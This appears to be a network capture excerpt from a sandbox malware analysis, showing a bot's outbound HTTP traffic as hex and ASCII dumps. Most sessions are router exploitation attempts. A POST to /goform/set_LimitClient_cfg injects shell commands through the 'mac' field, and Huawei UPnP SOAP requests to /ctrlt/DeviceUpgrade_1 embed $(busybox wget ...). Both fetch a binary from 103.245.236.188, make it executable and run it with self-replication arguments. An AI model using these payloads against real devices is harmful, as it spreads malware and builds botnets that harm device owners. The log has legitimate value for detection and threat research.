                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 46 72 69 2c 20 31 32 20 4a 61 6e 20 32 30 32 34 20 31 37 3a 32 34 3a 33 33 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 56 4d 2d 49 53 54 2d 30 31 34 78 5a 39 38 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 61 31 37 35 64 31 5f 56 4d 2d 49 53 54 2d 30 31 34 78 5a 39 38 5f 31 38 30 31 37 2d 32 35 30 34 30 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b 3d 22
                                                Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Fri, 12 Jan 2024 17:24:33 GMT<br><span class="F">IP: 102.165.48.42</span>Node information: VM-IST-014xZ98<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65a175d1_VM-IST-014xZ98_18017-25040<br><br>Check:<span class="C G" onclick="


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3777192.168.2.1342296163.171.216.558080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.409403086 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:33.629390001 CET1286INHTTP/1.1 400 Bad Request
                                                Server: nginx
                                                Date: Fri, 12 Jan 2024 17:24:33 GMT
                                                Content-Type: text/html
                                                Content-Length: 2449
                                                Connection: close
                                                x-ws-request-id: 65a175d1_VM-IST-014xZ98_17993-57262
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 46 72 69 2c 20 31 32 20 4a 61 6e 20 32 30 32 34 20 31 37 3a 32 34 3a 33 33 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 56 4d 2d 49 53 54 2d 30 31 34 78 5a 39 38 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 61 31 37 35 64 31 5f 56 4d 2d 49 53 54 2d 30 31 34 78 5a 39 38 5f 31 37 39 39 33 2d 35 37 32 36 32 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b 3d 22
                                                Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Fri, 12 Jan 2024 17:24:33 GMT<br><span class="F">IP: 102.165.48.42</span>Node information: VM-IST-014xZ98<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65a175d1_VM-IST-014xZ98_17993-57262<br><br>Check:<span class="C G" onclick="


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3778192.168.2.1355876221.147.198.888080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.474951982 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:34.378326893 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3779192.168.2.13361665.217.251.10037215
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.737572908 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 476
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 20 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                Jan 12, 2024 18:24:36.778296947 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 476
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 20 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                Jan 12, 2024 18:24:42.922286987 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 476
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 20 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                Jan 12, 2024 18:24:54.954339981 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 476
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 20 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


